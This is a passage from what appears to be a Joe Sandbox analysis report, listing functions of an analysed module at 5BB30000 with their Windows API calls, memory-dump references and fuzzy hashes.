                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Global$AcceleratorsAllocByteCharFreeLoadMultiWidelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 400132532-0
                                                                                                                                                                    • Opcode ID: 4e59ff09fb01961328fd57a931eccaa1b17ecd2a86f01085c0e440ee42880f41
                                                                                                                                                                    • Instruction ID: ad74f234e903fc789b55ad721387536bd442797cd2904f27944159c741214287
                                                                                                                                                                    • Opcode Fuzzy Hash: 4e59ff09fb01961328fd57a931eccaa1b17ecd2a86f01085c0e440ee42880f41
                                                                                                                                                                    • Instruction Fuzzy Hash: A7211FB5D00609AFDB00DF98C945BAEB7B6FF48310F108229F914A7284D7B5DA40DB95
                                                                                                                                                                    Function 5BB417A8 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB417C7
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB417E4
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB4182E
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB4183E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 871221524-0
                                                                                                                                                                    • Opcode ID: a925a881af3f388989389ed37b5183020163956da876000de3ded98ad012239d
                                                                                                                                                                    • Instruction ID: 1ae71789a9cb1ea12a4241843aff322efca2ec314a3b020ee4ddd5cdfee1e37a
                                                                                                                                                                    • Opcode Fuzzy Hash: a925a881af3f388989389ed37b5183020163956da876000de3ded98ad012239d
                                                                                                                                                                    • Instruction Fuzzy Hash: D121B3B6D00208EFCB04DF94D888BDEBBBABB48305F108158E915A7240D7B9DA94DF95
                                                                                                                                                                    Function 5BB3A79C Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • wcslen.MSVCRT ref: 5BB3A7A6
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3A7C3
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 5BB3A7E2
                                                                                                                                                                    • _hwrite.KERNEL32(?,?,?), ref: 5BB3A7F7
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB3A804
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Global$AllocByteCharFreeMultiWide_hwritewcslen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 762335071-0
                                                                                                                                                                    • Opcode ID: 9131b15ab121e49c467aa068c49594242a4f361871abc940b031741a961120e8
                                                                                                                                                                    • Instruction ID: b03e362f488cdfb2104fe771e046c6ed355965b0ed0093c9026cd7edc0c6cb8e
                                                                                                                                                                    • Opcode Fuzzy Hash: 9131b15ab121e49c467aa068c49594242a4f361871abc940b031741a961120e8
                                                                                                                                                                    • Instruction Fuzzy Hash: 7701E1B6A00209BFDB04DFD8C845FAE77B9FB48710F108159FA15A7284D6B1AA40DB65
                                                                                                                                                                    Function 5BB39FF3 Relevance: 6.1, APIs: 4, Instructions: 90memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3A05E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                    • Opcode ID: 5431e8108b7e93c7ad38ed47ebdae5d701bb2b3d588510476a1ed689d606d3e9
                                                                                                                                                                    • Instruction ID: 255683c25f877bb5b72b13642e11f88edc45d41198cb997393b3544e1fd069f6
                                                                                                                                                                    • Opcode Fuzzy Hash: 5431e8108b7e93c7ad38ed47ebdae5d701bb2b3d588510476a1ed689d606d3e9
                                                                                                                                                                    • Instruction Fuzzy Hash: E33160F2900608EFDB00DF94D849BEEB7B4FB48720F204219F514A7280D7B59940CBA9
                                                                                                                                                                    Function 5BB3FBE7 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(-0000001C), ref: 5BB3FC83
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • strcpy.MSVCRT(?,00000000), ref: 5BB3FC9E
                                                                                                                                                                    • EnumFontFamiliesExA.GDI32(?,00000000,?,?,?), ref: 5BB3FCC9
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3FCDC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$EnumFamiliesFontFreeGlobalstrcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1671893373-0
                                                                                                                                                                    • Opcode ID: d35c7c09c1714d070b7953d9925b134b498eadf9c54b4d2299f7acc0b82129ce
                                                                                                                                                                    • Instruction ID: 4d88250204f5786ec1b3f35cda37dab9b7011068fff311d264c040113ae70f4e
                                                                                                                                                                    • Opcode Fuzzy Hash: d35c7c09c1714d070b7953d9925b134b498eadf9c54b4d2299f7acc0b82129ce
                                                                                                                                                                    • Instruction Fuzzy Hash: BA412CB9A04288EFCB05CFA8C490ADDBBB1FF59310F14C159EC59AB342C670EA45CB65
                                                                                                                                                                    Function 5BB37BFE Relevance: 6.0, APIs: 4, Instructions: 38memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowTextLengthW.USER32(?), ref: 5BB37C11
                                                                                                                                                                    • GetWindowTextLengthA.USER32(?), ref: 5BB37C1D
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB37C30
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB37C5C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: GlobalLengthTextWindow$AllocFree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 478760672-0
                                                                                                                                                                    • Opcode ID: 4ba3391d0c2044a669a027b75972d672eaffb3ee83f023390f284ba870b3ae66
                                                                                                                                                                    • Instruction ID: 4faa487cc9d4ada2345b5738846a802bac369c873a86fcc8ee33bb0551a7911a
                                                                                                                                                                    • Opcode Fuzzy Hash: 4ba3391d0c2044a669a027b75972d672eaffb3ee83f023390f284ba870b3ae66
                                                                                                                                                                    • Instruction Fuzzy Hash: 2B012CB5A00209FFCB04DFA4C588FADBBB9FB48301F108159F905A7240D6F5DA80EB54
                                                                                                                                                                    Function 5BB3E3A8 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3E3BE
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3E3CE
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • ObjectCloseAuditAlarmA.ADVAPI32(00000000,?,?), ref: 5BB3E3ED
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3E400
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$AlarmAuditCloseErrorFreeGlobalLastObject
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 570505851-0
                                                                                                                                                                    • Opcode ID: 4787855c26dc9f58430a23df7370736269a33c3c6954f68eaef49bbfb8a40509
                                                                                                                                                                    • Instruction ID: fca22863d3f99f943faca69b11e91b9c4a69742eecb687ada413b4a94e761a88
                                                                                                                                                                    • Opcode Fuzzy Hash: 4787855c26dc9f58430a23df7370736269a33c3c6954f68eaef49bbfb8a40509
                                                                                                                                                                    • Instruction Fuzzy Hash: AA01ECB6901208EFDB01DFA4C948B9EBBB5FB48301F108159F905A7280D7B69B84EB65
                                                                                                                                                                    Function 5BB3EBB8 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3EBCE
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3EBDE
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • BuildCommDCBA.KERNEL32(00000000,?), ref: 5BB3EBF9
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3EC0C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$BuildCommErrorFreeGlobalLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4064689889-0
                                                                                                                                                                    • Opcode ID: 2cf87441c1fdc0f2c5e709e05b10e42c50fec51e4941199853f120ae12a6626a
                                                                                                                                                                    • Instruction ID: 66abab8c7e1535f856746cbf6b9673e718472d6d819d40f5254c54d6cde24bf2
                                                                                                                                                                    • Opcode Fuzzy Hash: 2cf87441c1fdc0f2c5e709e05b10e42c50fec51e4941199853f120ae12a6626a
                                                                                                                                                                    • Instruction Fuzzy Hash: 01F0A9B5900208EFDB01DFA4D489BDDBBB5FB04301F508559F905AB280D7F69A84EB65
                                                                                                                                                                    Function 5BB3CF9F Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3CFB5
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3CFC5
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • SetFileAttributesA.KERNEL32(00000000,?), ref: 5BB3CFE0
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3CFF3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$AttributesErrorFileFreeGlobalLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3187813303-0
                                                                                                                                                                    • Opcode ID: 8ff9a0fde598f3c7797b3ebd963561f9482c9414ad01d04c88dc2cd2cfa20510
                                                                                                                                                                    • Instruction ID: adafb9b8c4b08c4cddb16dacd5f7d1431cc2158b52c0befcf79a861fce84e049
                                                                                                                                                                    • Opcode Fuzzy Hash: 8ff9a0fde598f3c7797b3ebd963561f9482c9414ad01d04c88dc2cd2cfa20510
                                                                                                                                                                    • Instruction Fuzzy Hash: 19F09CB6900208EFDB00DFE4D449B9DBBB5FB08301F208159E505A7284D7B69688DB95
                                                                                                                                                                    Function 5BB3DBF5 Relevance: 6.0, APIs: 4, Instructions: 32pipeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3DC0B
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3DC1B
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • WaitNamedPipeA.KERNEL32(00000000,?), ref: 5BB3DC36
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3DC49
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$ErrorFreeGlobalLastNamedPipeWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1815014557-0
                                                                                                                                                                    • Opcode ID: eb5d551fa411110e3d2668beeecc09c24875841c766aa242129c4d930ad6a8a9
                                                                                                                                                                    • Instruction ID: cebafef8a1ba9c8d3df20e1340b8f329bcc40bffde454af0658ffc56fbb20227
                                                                                                                                                                    • Opcode Fuzzy Hash: eb5d551fa411110e3d2668beeecc09c24875841c766aa242129c4d930ad6a8a9
                                                                                                                                                                    • Instruction Fuzzy Hash: F1F0F9B5900208EFDB00EFA4D489B9DBBB9FB08301F508458E805A7280D7F59A84EB95